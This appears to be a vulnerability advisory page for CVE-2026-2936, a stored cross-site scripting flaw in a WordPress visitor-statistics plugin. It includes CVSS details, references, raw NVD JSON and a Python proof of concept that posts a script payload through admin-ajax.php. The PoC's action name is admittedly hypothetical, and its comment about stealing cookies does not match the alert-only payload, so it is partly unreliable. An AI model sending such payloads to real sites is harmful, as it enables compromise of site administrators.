CVE-2026-2936

Description

The Visitor Traffic Real Time Statistics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page_title' parameter in all versions up to, and including, 8.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an admin user accesses the Traffic by Title section.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Visitor Traffic Real Time Statistics <= 8.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-2936
# This script demonstrates the injection of a malicious payload via the 'page_title' parameter.

import requests

target_url = "http://example.com"

# Malicious payload to steal admin cookies
payload = "<img src=x onerror=alert('XSS')>"

# The vulnerable endpoint is often part of the traffic tracking mechanism
# Attackers send a request with the crafted page_title
endpoint = f"{target_url}/wp-admin/admin-ajax.php"

data = {
    "action": "vtrts_update_stats", # Hypothetical action name based on plugin functionality
    "page_title": payload
}

try:
    response = requests.post(endpoint, data=data)
    if response.status_code == 200:
        print("[+] Payload injected successfully!")
        print("[+] Wait for an administrator to view the 'Traffic by Title' section.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2936
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2936
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2936/
[4] VulDB https://vuldb.com/cve/CVE-2026-2936
[5] https://plugins.trac.wordpress.org/changeset/3466230/visitors-traffic-real-time-statistics
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/bd8e86b0-5e06-44e0-a94c-b05581f46e5a?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2936", "sourceIdentifier": "[email protected]", "published": "2026-04-04T12:16:03.090", "lastModified": "2026-04-24T18:13:28.877", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Visitor Traffic Real Time Statistics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page_title' parameter in all versions up to, and including, 8.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an admin user accesses the Traffic by Title section."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3466230/visitors-traffic-real-time-statistics", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bd8e86b0-5e06-44e0-a94c-b05581f46e5a?source=cve", "source": "[email protected]"}]}}